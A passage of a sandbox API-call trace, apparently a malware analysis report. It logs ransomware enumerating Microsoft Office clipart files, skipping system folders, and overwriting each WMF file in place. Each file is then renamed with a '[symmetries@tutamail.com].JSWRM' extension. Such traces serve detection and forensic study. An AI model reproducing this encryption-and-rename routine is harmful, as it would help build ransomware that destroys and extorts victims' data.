lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.354] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23726) returned 1 [0087.354] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ca0) returned 0x24d210 [0087.354] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5ca0, lpOverlapped=0x0) returned 1 [0087.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.383] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5ca0, lpOverlapped=0x0) returned 1 [0087.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.383] CloseHandle (hObject=0x314) returned 1 [0087.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0087.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0087.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0087.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0087.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0087.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0087.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.385] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198021.WMF", cAlternateFileName="")) returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2=".") returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="..") returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="...") returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="windows") returned -1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="recovery") returned -1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="perflogs") returned -1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="documents and settings") returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="system volume information") returned -1 [0087.385] lstrcmpiW (lpString1="J0198021.WMF", lpString2="msocache") returned -1 [0087.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198021.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198021.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198021.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0087.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198021.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198021.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198021.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.386] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34912) returned 1 [0087.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8860) returned 0x24d210 [0087.386] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8860, lpOverlapped=0x0) returned 1 [0087.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.390] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8860, lpOverlapped=0x0) returned 1 [0087.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.391] CloseHandle (hObject=0x314) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0087.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0087.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0087.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.391] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.395] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6624, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198022.WMF", cAlternateFileName="")) returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2=".") returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="..") returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="...") returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="windows") returned -1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="recovery") returned -1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="perflogs") returned -1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="documents and settings") returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="system volume information") returned -1 [0087.395] lstrcmpiW (lpString1="J0198022.WMF", lpString2="msocache") returned -1 [0087.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198022.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198022.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198022.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198022.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198022.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198022.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.396] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26148) returned 1 [0087.396] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6620) returned 0x24d210 [0087.397] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6620, lpOverlapped=0x0) returned 1 [0087.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.400] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6620, lpOverlapped=0x0) returned 1 [0087.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.400] CloseHandle (hObject=0x314) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0087.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0087.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0087.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0087.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0087.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0087.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0087.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0087.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.402] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3cce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198025.WMF", cAlternateFileName="")) returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2=".") returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="..") returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="...") returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="windows") returned -1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="recovery") returned -1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="perflogs") returned -1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="documents and settings") returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="system volume information") returned -1 [0087.402] lstrcmpiW (lpString1="J0198025.WMF", lpString2="msocache") returned -1 [0087.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198025.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198025.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198025.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0087.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198025.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198025.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198025.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.403] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15566) returned 1 [0087.403] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3cc0) returned 0x24d210 [0087.403] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3cc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3cc0, lpOverlapped=0x0) returned 1 [0087.406] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.406] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3cc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3cc0, lpOverlapped=0x0) returned 1 [0087.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.407] CloseHandle (hObject=0x314) returned 1 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 